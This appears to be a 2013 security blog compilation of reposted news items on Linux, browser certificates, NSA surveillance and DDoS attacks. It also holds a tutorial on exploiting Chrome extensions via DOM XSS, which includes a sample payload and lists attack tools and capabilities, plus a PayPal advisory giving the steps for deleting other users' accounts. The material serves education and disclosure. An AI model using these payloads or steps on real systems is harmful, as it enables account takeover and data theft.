Matt

Final release of Linux 3.11 is expected within a week, Torvalds said in a message echoing his 1991 post about the project It was 22 years ago on Sunday that Linus Torvalds announced in a newsgroup posting that he was creating a free operating system, a message he echoed in his announcement Sunday of the latest Linux kernel release candidate. "Hello everybody out there using minix - I'm doing a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones," Torvalds wrote on August 26, 1991, asking people to send in feature requests. On Sunday, Torvalds announced the Linux 3.11-rc7 kernel release in similar fashion. "Hello everybody out there using Linux -- I'm doing a (free) operating system (just a hobby, even if it's big and professional) for 486+ AT clones and just about anything else out there under the sun.A This has been brewing since april 1991, and is still not ready. I'd like any feedback on things people like/dislike in Linux 3.11-rc7," he wrote on Google+. "I originally ported bash(1.08) and gcc(1.40), but others have taken over user space and things still seem to work. This implies that I'll get the final 3.11 release within a week, and I'd like to know what features most people would want. Any suggestions are welcome, but I won't promise I'll implement them ," he added. Torvalds was also quick to add, in a comment on his post, that any feature requests would be a bit late. "Yeah, I don't really want to get feature requests this late in the rc series... But itA isA 22 years today since that email, and IA wouldA like people to try the current 3.11-rc7 kernel I just cut and uploaded to the usual places," he wrote. Version 3.11 of the Linux kernel has been given the codename Linux for Workgroups, a reference to Windows 3.11 for Workgroups, released by Microsoft a little over 20 years ago. One of the bigger changes from version 3.10 of the kernel is improved power management in AMD Radeon graphic chips. Source ComputerWorld.Com

The project aims to solve hiccups in how security tools work with web browsers Mozilla is developing a protocol that aims to let security tools and Web browsers work better together. Configuring a web browser to work with a security tool involves writing platform and browser-specific extensions, a non-trivial process that discourages people with less experience, wrote Simon Bennetts, a security automation engineer with Mozilla, on Thursday. The proposed standard, called "Plug-n-Hack," will define how security extensions can work with a browser in a more usable way, Bennetts wrote. PnH will allow the security tool to "declare the functionality that they support which is suitable for invoking directly from the browser." Under the current arrangement, if a user wants to, for example, intercept HTTPS traffic, a user must configure proxy connections through the tool and browser correctly and import the tool's SSL (Secure Sockets Layer) certificate, Bennetts wrote. "If any of these steps are carried out incorrectly then the browser will typically fail to connect to any website -- debugging such problems can be frustrating and time-consuming," Bennetts wrote. Users may also have to switch often between the tool and their browser to intercept an HTTPS request. "PnH allows security tools to declare the functionality that they support which is suitable for invoking directly from the browser," Bennets wrote. "A browser that supports PnH can then allow the user to invoke such functionality without having to switch to and from the tool." The PnH protocol is being designed to be browser and tool independent. The implementation for Firefox has been released under the Mozilla Public License 2.0 and can be incorporated into commercial products for free, Bennetts wrote. The next phase of the project is being planned, but it is expected it will allow browsers to "advertise their capabilities to security tools," he wrote. "This will allow the tools to obtain information directly from the browser, and even use the browser as an extension of the tool," Bennetts wrote. Send news tips and comments to jeremy_kirk@idg.com. Follow me on Twitter: @jeremy_kirk Source ComputerWorld.Com

Starting in early 2014 Google Chrome will block certificates issued after July 1, 2012, with a validity period of more than 60 months Mozilla is considering the possibility of rejecting as invalid SSL certificates issued after July 1, 2012, with a validity period of more than 60 months. Google already made the decision to block such certificates in Chrome starting early next year. "As a result of further analysis of available, publicly discoverable certificates, as well as the vibrant discussion among the CA/B Forum [Certificate Authority/Browser Forum] membership, we have decided to implement further programmatic checks in Google Chrome and the Chromium Browser in order to ensure Baseline Requirements compliance," Ryan Sleevi, a member of the Google Chrome Team said Monday in a message to the CA/B Forum mailing list. The checks will be added to the development and beta releases of Google Chrome at the beginning of 2014. The changes are expected in the stable release of Chrome during the first quarter of next year, Sleevi said. The Baseline Requirements for the Issuance and Management of Publicly-Trusted Certificates, sometimes simply referred to as the Baseline Requirements, is a set of guidelines agreed upon by all certificate authorities (CAs) and browser vendors that are members of the CA/B Forum. Version 1.0 of the Baseline Requirements went into effect on July 1, 2012, and states that "Certificates issued after the Effective Date MUST have a Validity Period no greater than 60 months." It also says that certificates to be issued after April 1, 2015, will need to have a validity period no greater than 39 months, but there are some clearly defined exceptions to this requirement. The shortening of certificate validity period is a proactive measure that would allow for a timely implementation of changes made to the requirements in the future. It would be hard for future requirements, especially those with a security impact, to have a practical effect if older certificates that aren't compliant with them would remain valid for 10 more years. Google identified 2,038 certificates that were issued after July 1, 2012, and have validity periods longer than 60 months, in violation of the current Baseline Requirements. "We encourage CAs that have engaged in this unfortunate practice, which appears to be a very limited subset of CAs, to reach out to affected customers and inform them of the upcoming changes," Sleevi said referring to the fact that Chrome will start blocking those certificates in the beginning of 2014. On Thursday, a discussion was started on the Mozilla bug tracker on whether the company should enforce a similar block in its products. "Everyone agrees such certs, when newly issued, are incompatible with the Baseline Requirements," said Gervase Markham, who deals with issues of project governance at Mozilla, on the bug tracker. "Some CAs have argued that when reissued, this is not so, but Google does not agree with them. We should consider making the same change." Source ComputerWorld.Com

The NSA paid millions to compensate companies' surveillance costs, new documents claim Technology companies may be hiding behind legal jargon to avoid being more forthcoming in their responses to new documents on government surveillance that were disclosed Friday, some experts say. Internet and software companies including Microsoft, Yahoo, Google and Facebook "are legally compelled to lie," said security expert Bruce Schneier, citing national security letters that companies are prohibited from disclosing. Some similar statements were made in interviews with the IDG News Service following a report published Friday in The Guardian alleging that the National Security Agency paid millions of dollars to companies such as Google and Facebook to cover costs involved in surveillance. The tech companies incurred these costs in fulfilling tighter certification requirements after a 2011 court ruling said the government's data collection was unconstitutional, according to documents obtained by The Guardian. That ruling, which was handed down by the Foreign Intelligence Surveillance Court and was made public on Wednesday, said that the way the NSA collected data violated the Fourth Amendment because the agency did not effectively design its collection efforts to target only foreigners of interest to national security. The NSA was "misusing its authority" by collecting the digital communications of U.S. citizens for years, the ruling said. The documents revealed Friday describe the problems that the agency experienced after that ruling and the resulting efforts required to bring companies into compliance, according to The Guardian. The list of involved companies includes Google, Yahoo, Microsoft and Facebook, its report said. The documents were passed on to The Guardian by former NSA contractor Edward Snowden, the man behind the original leaks of various government surveillance programs such as Prism. The documents provide the first evidence of a financial relationship between technology companies and the NSA, the Guardian report said. The FISA court is required to sign annual certifications that provide the legal framework for surveillance operations, the report said. After the 2011 ruling, those certifications were only being renewed on a temporary basis as the NSA worked to fix its data collection methods that the court deemed unconstitutional. This adjustment process entailed huge costs, according to a 2012 NSA newsletter entry, excerpts of which were published by The Guardian. "Last year's problems resulted in multiple extensions to the certifications' expiration dates which cost millions of dollars for Prism providers to implement each successive extension," the newsletter said. The Guardian did not give an exact figure for the costs. The latest disclosure raises serious questions around the use of taxpayer money to finance government surveillance, the Guardian said. But another issue is the growing discrepancy between the information contained in leaked government documents and technology companies' responses to it. Source ComputerWorld.Com

Hackers could find themselves in the catbird seat on April 8, 2014 -- the day Microsoft plans to stop patching Windows XP. As security expert Jason Fossen sees it, those who have zero-day exploits for XP will bank them until that day and then sell them to crooks or loose them themselves on unprotected PCs. It's simply economics at work, said Fossen, a trainer for the SANS Institute since 1998. "The average price on the black market for a Windows XP exploit is $50,000 to $150,000, a relatively low price that reflects Microsoft's response," said Fossen. When a new vulnerability -- dubbed a "zero-day" -- is detected, Microsoft investigates, pulls together a patch and releases it to XP users. But the price will go up when Microsoft stops patching its aged operating system. Fossen acknowledged that there really aren't any precedents to back up his speculation, because the last time Microsoft retired an operating system was in July 2010, when it pulled the plug on Windows 2000, which wasn't nearly as widely used as XP is. Computerworld has projected that Windows XP will still run 33% to 34% of the world's PCs at the end of April 2014. HD Moore, creator of the popular Metasploit penetration testing toolkit and chief security officer at security company Rapid7, agreed that XP hacks would become more valuable after the operating system's retirement in April 2014, but he contended that all Windows vulnerabilities would jump in value at that time. Source ComputerWorld.Com

Reports suggest that the news about the NSA's secret data-collection program is causing foreign users to look elsewhere for cloud-based services. Edward Snowden's revelations about the National Security Agency's Prism surveillance program could cause U.S. providers of cloud-based services to lose 10% to 20% of the foreign market -- a slice of business valued at up to $35 billion. A new report from the Information Technology & Innovation Foundation (ITIF) concludes that European cloud computing companies, in particular, might successfully exploit users' fears about the secret data collection program to challenge U.S. leadership in the hosted services business. Daniel Castro, author of the report, acknowledges that the conclusions are based, so far, on thin data, but nonetheless argues that the risks to U.S. cloud vendors are real. Indeed, a month prior, the Cloud Security Alliance reported that in a survey of 207 officials of non-U.S. companies, 10% of the respondents said that they had canceled contracts with U.S. service providers after Snowden's leak of NSA Prism documents earlier this year. "If U.S. companies lose market share in the short term, it will have long-term implications on their competitive advantage in this new industry," said Castro in the ITIF report. "Rival countries have noted this opportunity and will try to exploit it." To counter such efforts, the U.S. must challenge overstated claims about the program by foreign companies and governments, said Jason Weinstein, a partner in the Washington office of law firm Steptoe & Johnson and a former federal prosecutor and deputy assistant attorney general specializing in computer crime. "There are a lot of reasons to be concerned about just how significant those consequences will be," Weinstein said. "The effort by European governments and European cloud providers to cloud the truth about data protection in the U.S. was going on well before anyone knew who Edward Snowden was. It just picked up new momentum once the Prism disclosures came out." Weinstein contends that European countries have fewer data protection rules than the U.S. For example, he said that in the U.K. and France, a wiretap to get content can be issued by a government official without court authority, but that can't happen in the U.S. "U.S. providers have done nothing other than comply with their legal obligations," he said. But because of Snowden's leaks, "they are facing potentially significant economic consequences." Gartner analyst Ed Anderson said his firm has yet to see any revenue impact on cloud providers since the Prism disclosures, but added, "I don't think Prism does U.S. providers any favors, that's for sure." Nonetheless, Anderson added, "I think the reality is [the controversy] is likely to die down over time, and we expect adoption to probably continue on the path that it has been on." One reason why U.S. providers may not suffer is because "the alternatives aren't great if you are a European company looking for a cloud service," he said. Like Weinstein, Anderson said European governments also access private online data. "If you think that Prism is the only program in the world where a government is inspecting private data, you are pretty naive," he said. Nonetheless, Anderson did warn that continued "missteps on the part of the U.S. government" could have a long-term impact on the worldwide perception of the U.S. cloud computing business. Source ComputerWorld.Com

China's Internet was hit with a major distributed denial of service (DDoS) attack Sunday morning that briefly disrupted and slowed access to sites in the .cn domain. The DDoS attack was the largest in history against the domain servers for China's .cn ccTLD (country code top level domain), according to the China Internet Network Information Center (CNNIC), which administers the domain. The first attack started Sunday around midnight Beijing time, and was then succeeded by a larger attack at 4 a.m, the CNNIC said in an Internet posting. A number of sites were affected, but Internet service to the sites had been gradually restored by 10 a.m. Sunday It's unclear where the attack originated from or if it was still continuing. A CNNIC spokeswoman said on Monday it would update the public once more information was gathered. Chinese regulators have already launched unspecified measures to protect the domain system, while CNNIC has apologized for the disruption. China has often been accused of launching DDoS attacks. In this year's first quarter, it was the top source country for DDoS attacks, according to security vendor Prolexic. The U.S. was ranked second. DDoS attacks can commonly work by deploying armies of hacked computers to send traffic to a website, saturating it with data so that it becomes inaccessible to normal users.A China, however, has said its facing a surge of Trojan and botnet attacks against the country. Many of those attacks are coming from the U.S., South Korea and Germany. China has also denied the country sponsors hacking, despite claims brought by U.S. officials and security vendor Mandiant that its government actively conducts cyber-espionage. Source Computerworld.Com

The agency reportedly cracked the system's encryption to snoop on internal UN communications The U.S. National Security Agency reportedly cracked the encryption used by the video teleconferencing system at the United Nations headquarters in New York City. In June 2012 the NSA department responsible for collecting intelligence about the U.N. gained "new access to internal United Nations communication," German magazine Der Spiegel reported Monday based on information from secret NSA documents provided by former NSA contractor Edward Snowden. The NSA technicians were able to crack the encryption used by the U.N.'s internal video teleconferencing (VTC) system allowing VTC traffic to be decrypted. "This traffic is getting us internal UN VTCs (yay!)," one of the internal NSA documents said, according to Der Spiegel. In less than three weeks, the number of U.N. communications that the NSA managed to intercept and decrypt rose from 12 to over 450. According to another NSA internal report from 2011, the agency caught the Chinese spying on the U.N. and managed to tap into their signals intelligence (SIGINT) collection to gain insight into high interest and high profile events at the time. Media reports in June based on documents leaked by Snowden claimed that the European Union mission to the U.N. in New York and its delegation in Washington, D.C. have also been bugged by the NSA, prompting E.U. officials to demand answers from the U.S. government. The NSA was able to maintain persistent access to computer networks at E.U. delegations in New York and Washington by taking advantage of the Virtual Private Network (VPN) linking them, Der Spiegel also reported Monday. "If we lose access to one site, we can immediately regain it by riding the VPN to the other side and punching a whole [sic] out," an internal NSA presentation said, according to the German magazine. "We have done this several times when we got locked out of Magothy." "Magothy" is the internal code name used by the NSA for the E.U. delegation in Washington, D.C. The code name used for the E.U. mission in New York is "Apalachee." New security systems were installed to protect the restricted area hosting the server room at the offices of the E.U. delegation to the U.N. in New York a few weeks ago, following the June reports about the NSA targeting the E.U.'s diplomatic missions in the U.S., Der Spiegel said. An investigation was launched and technicians have searched for bugs and checked the computer network. Source ComputerWorld.Com

Traffic management firm Gigamon has unveiled an update for its GigaVue service that offers IT teams the ability to gain insights on the different traffic demands from different areas of the business. The GigaVue 3.1 update will include a Visibility as a Service (VaaS) add-on within the Flow Mapping process to enable administrators to supply data on the traffic within departments. This could be used by teams such as marketing to analyse visitor traffic, or security teams looking at event monitoring after an incident. Gigamon chief strategy officer Shehzad Merchant said that providing this kind of system will help enterprises benefit from the cloud in internally to gain greater insights into their data. “The notion of multi-tenancy has made its way from the public cloud space into enterprise IT infrastructure as well,” he said. “This solution enables network administrators and services teams to virtualise the Visibility Fabric and offer Visibility as a Service to the different IT departments.” The firm said that this capability will enable organisations to alter management policies on a per-team and per-department basis as needs requires, while maintaining the compliance and privacy controls they have in place across the enterprise. These tenants, who include various IT operations teams, will have the power to dynamically change monitoring and traffic visibility policies on a per-organisation or per-tenant basis without impacting other departmental monitoring polices, while maintaining compliance and privacy. The GigaVue 3.1 update also includes a host of other updates such as role-based access control capabilities and improved workflow displays for monitoring of policy configurations. The update will be launched on 30 September for no additional cost for existing customers of the GigaVue tool. Source V3.CO.UK

1. Introduction We are living in an age defined by SPEED. We look always for shortcuts, faster ways, and faster solutions in order to save our time. Supposing most of the people use browser extensions because they are too lazy to download and install a software with the same functions as the extension, or they want to save some time or because they just discovered a faster way to explore lots of features in a short time, I will continue the talk about the danger behind browser extensions. 2. What are these extensions? Firstly chrome extensions are NOT browser plugins, they are browser add-ons, HTML5 applications that enrich the browser’s user experience. By installing these extensions, you give your browser additional functionality (mail notification, ad blocking, online bookmarking, developer tools, page recommendation, notebooks, and so on). 3. Why are they so interesting as a subject of research? Google chrome extensions are basically HTML applications, so they suffer for the same vulnerabilities as usual websites but the difference between extensions and websites is the fact that an extension requires higher level access privileges. For example, in theory, extensions can read and write all the cookies so they are a good to start a hijacking attack. They can even change your proxy settings, block requests that your browser is trying to send over HTTP or HTTP, can take screenshots of websites and so on. Knowing this I figured why the extensions are so popular, we should take a closer look and try to avoid the bad things extensions can bring. 4. How are they built? Basically they are a bunch of files (HTML + JS + CSS ), zipped and signed with a developer key, (just like a usual mobile application) packaged into a CRX file.. 5. How we can install these things? We can install the extensions more or less from the Chrome Web Store, also we can install them from some 3rd party websites or just manually by dragging the extension CRX file intothe chrome extensions page and hit the install option. 6. Extension Components Extensions have a few distinct components: -Manifest File –similar like most mobile applications, this file lists all the components embedded and defined by the application permissions. Manifest files are just a simple JSON file, containing the name of the extension, description, permissions and one of more important sections is “content_scripts” Example of Manifest File -matches is a regular expression which defines on which website the extension or the content script going run. So as long the URL matches the settings in the extension, the browser will load up the content script. -Content Scripts – on presented example we have jquery-1.8.1 and content.js as content scripts -View Pages – this component is related to the user interface. Extensions can have a little button on the right top bar of browser interface, also can have a options page, usually loaded as a pop-up, where we are able to adjust extension functionalities. To make things more complicated, extensions have some background pages that runs constantly in a hidden mode and lives inside the browser session. So as long as you can execute code in that domain, the background page is persistent. - NPAPI Plugins (optional) – some extensions also bundle NPAPI plugins which are simple binary code compiled for the architecture of the browser. The Code running in an NPAPI plugin has the full permissions of the current user and is not sandboxed or shielded from malicious input so we must double check the source of the extensions that use NPAPI before installing and using them. 7. Security – How secure are the extensions we use? First let’s take a look at how all these components talk to each other. The first part, Content Script, runs in a context or in origin of the webpage that is been displayed, so of course it can access the actual DOM elements. It can modify the DOM to enrich the website (for example, to capture all the images or to insert some additional toolbars and so on). It uses the standard JavaScript DOM access like HTML property, document cookies or document title. So this is a way of exchanging information between the website and a part of the extension greater than the content script. BUT at the same time, the content script cannot stock the information directly to the JavaScript already running. Also it cannot call functions, it cannot be called from the original website so there is a security boundary here. Content Script also has access to the part of the extension that is able to submit AJAX requests which is much powerful because it’s a cross domain, so it can get the response back. View Pages, can communicate with the Content Script and vice versa only by sending messages and receiving responses (similar with HTML5 post messages API). No direct functions calls, no DOM access just exchanging messages. BUT View Pages in a background page can instantiate new content scripts which is a form of an evil because, you can directly pass the code as a string parameter here and it will get evaluated as a content script in the context of the webpage that has been viewed. View and Background Pages are the only components of a Google Chrome extension which has access to this powerful extension API and represent the hard stuff of an extension because using this API, the extension can change proxy settings, monitor requests, access cookies in open tabs, take screenshots of open websites and access the data that you pasted in your clipboard. Also the background pages by default can call NPAPI plugins. 8. Permissions listed upon installation Similar of what mobile applications on most platforms do, Extensions have Permissions which are displayed to the user and requires user agreement. 9. Attacking Extensions So, extensions are HTML applications and there are a lot of them. We also know that one of most dangerous HTML vulnerabilities is XSS. View page DOM XSS was a really, really bad thing last year and after some research I discovered a lot of extensions vulnerable to DOM XSS. Basically, when you design web applications, no matter if they are chrome extensions or websites it’s easier to write a vulnerable code. Than a safe one. 10. How does a typical XSS take place? In this article I will focus on vectors employing a malicious website. The model is users have a vulnerable extension installed and visit a malicious website which tries to exploit the extension. Here’s a small example: Supposing we have a payload in a webpage DOM, let’s say it’s in the title of a bookmarking extension. Acting as the extension somehow, the user interface attaches by clicking on a button that the extension has provided in the website. Of course the content script fetches the payload from the DOM into its own variable, and then the extension forwards it to the View page by sending a message with the title of the page the user wants to bookmark. Then the View Page does its logic and decides to display the title of the website back. So we will have a malicious webpage bookmarked, a classic DOM XSS vulnerability. <title>Bad Title'-alert(1)-'</title> => a = document.titlechrome.extension.sendRequest ({ do: “bookmark”, url: document.location, title:a }...) => $(‘#bookmarklist’).append(‘<li>’ + title + ‘</li>’); This is not a DOM XSS just in just a website, actually it’s an XSS in a view page of an extension so it will get access to all API’s that the extension was permitted to access. The XSS can be really simple, running on the background and just accessing the evil function and executing it. 11. NPAPI Binary code vulns Are far scarier but not that common it’s when you have NPAPI plugin and binary code vulnerabilities inside. Usually looks like this: Malicious payload in a DOM > gets transferred to the content script > then transferred to the view page and then the view page accesses the method that is exported by NPAPI plugin. NPAPI plugins are simply binary code so as long they have some binary vulnerabilities like command injection or buffer overflow or format string vulnerabilities, we can exploit it, from the webpage. The interesting thing is the code executed in NPAPI plugin runs with just user permissions. 12. Tools for exploiting Chrome extensions -BeFF – Fake Flash Update Module – is basically a very good tool to exploit XSS. -XSSchef – Chrome extension Exploitation Framework What can you actually do (when having appropriate permissions)? Monitor open tabs of victims Execute JS on every tab (global XSS) Extract HTML, read/write cookies (also httpOnly), localStorage Get and manipulate browser history Stay persistent until whole browser is closed (or even futher if you can persist in extensions’ localStorage) Make screenshot of victims window Further exploit e.g. via attaching BeEF hooks, keyloggers etc. Explore filesystem through file:// protocol Bypass Chrome extensions content script sandbox to interact directly with page JS -Mosquito – Chrome Extension exploitation tool Mosquito is a Google Chrome extension exploitation tool allowing an attacker to leverage XSS found in extension content script, to issue arbitrary cross-domain HTTP requests with victim browser (and victim cookies). With this tool attackers can exploit content-script XSS vulnerabilities in extensions based on manifest v1 and v2. Mosquito requires also -MalaRIA (JDK to compile) -websockify (Python and some libs to run it) -a confirmed content-script XSS vulnerability in Google Chrome extension CONCLUSION: Extensions are vulnerable as well and exploiting them give more powers so double check if the extension you need will not pwn your ass! References: 1. Developer chrome – extensions 2. Developer chrome – tutorials 3. Advanced Chrome extension exploitation – whitepaper Tools: 1. BeFF – fake flash update module 2. XSSCHEF – Chrome extension exploitation framework 3. Mosquito – Chrome extension exploitation tool Source Resources.InfoSecInstitute.COM

Agentia Nationala de Securitate (NSA) a SUA strangea in mod regulat informatii in reprezentantele Uniunii Europene (UE) la New York si Washington, a reusit sa obtina acces la conferintele video interne al ONU si considera sediul de la Viena al Agentiei Internationale pentru Energie Atomica (AIEA) drept una dintre tintele-cheie pentru spionaj, potrivit unei noi transe de dezvaluiri ale fostului colaborator al CIA Edward Snowden, informeaza duminica saptamanalul Der Spiegel, preluat de Itar-Tass. In aprilie anul curent, angajatii NSA au elaborat un tabel de prioritati, de la cea mai mare (gradul 1) pana la cea mai mica (gradul 5) si le-a atasat anumitor state si institutii internationale. Rusia, alaturi de Iran, Coreea de Nord si China au fost clasate ca prioritati de gradul 1, (UE) - de gradul III, potrivit documentelor dezvaluite de Snowden. In cazul UE, NSA era interesata in primul rand de stabilitatea financiara, relatiile comerciale si politica externa. Ca prioritate de gradul II a fost clasata informatia de politica externa din ONU. Potrivit Der Spiegel, NSA are colaboratori proprii la ONU, care lucreaza acolo ca diplomati. In afara de aceasta, specialisti in tehnologie ai NSA au reusit, in 2012, sa obtina acces sa reteaua organizatiei, fapt pe care l-au si comentat, in mod entuziast, intr-un raport al lor: "Fluxul de date ne deschide accesul la conferintele interne ale ONU, ura". Pentru obtinerea de informatii legate de UE, NSA a plasat microfoane la misiunea UE pe langa sediul ONU de la New York, precum si la reprezentanta organizatiei de la Washington, informeaza Spiegel. In acelasi timp, NSA a reusit sa se conecteze la reteaua interna de computere a reprezentantei ONU din capitala SUA - sa obtina acces la purtatorii de informatii digitali, lucru atestat de documente secrete ce dateaza din septembrie 2010. De prioritate maxima beneficiaza de asemenea informatiile de la sediul central al Agentiei Internationale pentru Energie Atomica (AIEA), din capitala austriaca. Cu gradul I sunt marcate informatiile privind controlul asupra armelor. Der Spiegel relateaza de asemenea despre programele secrete Blarney si Rampart-T. Primul dateaza din 1978 si reuneste asemenea tinte precum "varfurile diplomatice, antiterorismul, guvernele straine si economia". Informatiile din acest program ajung zilnic pe masa de lucru a presedintelui SUA, Barack Obama, subliniaza publicatia germana. Al doilea program dateaza din 1991 si urmareste "conducerile supreme si persoane apropiate acestora". Tinte ale Rampart-T sunt, potrivit Der Spiegel, 20 de state, intre care Rusia si China. Source Business24.RO

Description : OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Author : Ajin Abraham Source : OWASP Xenotix XSS Exploit Framework 4 ? Packet Storm Download : HERE

Description : ZedLog is a robust cross-platform input logging tool (or key logger). It is based on a flexible data logging system which makes it easy to get the required data. It captures all keyboard and mouse events, has a full GUI, and supports logging to a file and basic hiding. Author : Zachary Scott Source : ZedLog 0.2 Beta 4 ? Packet Storm Download : HERE

Description : Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that. Author : sparty.secniche.org Source : Sparty 0.1 ? Packet Storm Download : HERE

Description : netsniff-ng is is a free, performant Linux network sniffer for packet inspection. The gain of performance is reached by 'zero-copy' mechanisms, so that the kernel does not need to copy packets from kernelspace to userspace. For this purpose netsniff-ng is libpcap independent, but nevertheless supports the pcap file format for capturing, replaying and performing offline-analysis of pcap dumps. netsniff-ng can be used for protocol analysis, reverse engineering and network debugging. Author : Tobias Klauser, Daniel Borkmann Source : Netsniff-NG High Performance Sniffer 0.5.8 ? Packet Storm Download : HERE

Description : Paypal suffers from an arbitrary account deletion vulnerability that leverages unvalidated email account additions. Author : Cernica Ionut / mah_one Source : Paypal Account Deletion ? Packet Storm Code : Title: ====== PayPal Bug Bounty #110 - Auth Bypass (Session) Vulnerability Date: ===== 2013-08-21 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1056 PayPal Security UID: oebaLK VL-ID: ===== 1056 Common Vulnerability Scoring System: ==================================== 9.1 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= An independent vulnerability laboratory researcher discovered a Web Vulnerability in the PayPal QR Labs Service Web Application. Report-Timeline: ================ 2012-04-27: Researcher Notification & Coordination (Cernica Ionut) 2013-04-28: Vendor Notification (PayPal Inc Security Incident Team - Bug Bounty Program) 2013-05-05: Vendor Response (PayPal Inc Security Incident Team - Bug Bounty Program) 2013-08-20: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward) 2013-08-21: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== PayPal Inc Product: PayPal Account Service Application 2013 Q2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Proof of Concept: ================= The vulnerability can be exploited by remote attackers with low privilege paypal application user account and without user interaction. For demonstration or reproduce ... After testing the web application paypal.com I discovered that if you have an US account and the following page is visited (https://www.paypal.com/us/cgi-bin/?&cmd=_bc-signup&channel=1&promo=503), you can add a new email from that page. The problem is even the e-mail you try to add to your account is already registered with paypal the new e-mail will be added into your account as unconfirmed. Delete any account on PayPal: After you added an existing email to your account if you go to the account profile an you delete the unconfirmed email, the original account will be deleted too. Auth Bypass: After you removed the account, you can make another one with same username with your desired password, but you will have no money and is not confirmed. video P.o.C.: http://www.youtube.com/watch?feature=player_embedded&v=Txj_uFYTVuo Solution: ========= 2013-08-20: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward) Risk: ===== The security risk of the session account auth bypass vulnerability is estimated as critical. Credits: ======== Independent Security Researcher – Cernica Ionut Cosmin (ionut.cernica@whit3hat.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

